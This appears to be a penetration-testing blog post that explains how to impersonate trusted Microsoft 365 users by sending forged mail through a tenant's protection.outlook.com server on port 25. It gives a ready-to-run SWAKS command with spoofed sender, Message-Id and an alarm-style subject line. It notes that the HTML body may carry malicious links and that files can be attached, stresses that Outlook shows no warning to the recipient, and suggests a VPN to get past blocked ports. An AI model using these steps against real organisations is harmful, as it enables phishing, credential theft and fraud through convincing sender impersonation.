If a company is using M365 it is probable that this technique can be used to impersonate other trusted users from within the tenancy or any M365 account from within the same region.
The company MX records may resolve to:
companyname-com-au.protection.outlook.comIf so, this server is likely advertising SMTP on the unencrypted port 25.
If they do not use such server, you can still attempt this technique using any .protection.outlook.com domain from the same Azure region.
This will only work sending TO & FROM M365 accounts in the same region As the server used.
To send an email impersonating another user, we can use SWAKS.
Example command:
swaks --to [email protected] --from [email protected] --server victim-com-au.mail.protection.outlook.com --port 25 --header "X-Mailer: CustomMailer" --header "Message-Id: <20250319100737.1988881@Windows10>" --ehlo Windows10Corp --header "From: Sender Name <[email protected]>" --header "Subject: Suspicious Activity Alert" --attach-type text/html --attach-body @template.htmlTemplate.html can be any email HTML template, and can contain malicious links. You can also attach files
If you want to add an attachment using SWAKS, you need to:
- Specify the files mime type with --attach-type
- Specify the files name with --attach-name
- Specify the file with —attach
--attach-type text/plain --attach-name example.txt --attach @example.txtThe beauty of this technique is that Outlook trusts this service and treats the sender as verified. If sent internally, Microsoft will not display any warnings and will even display the senders real profile image/info to the recipient.
Real Life Example:
Things to note
- Some ISP’s in Australia block outgoing traffic to port 25 so the server may appear down. If you connect to AWS or another VPN, port 25 should be accessible on these target servers.
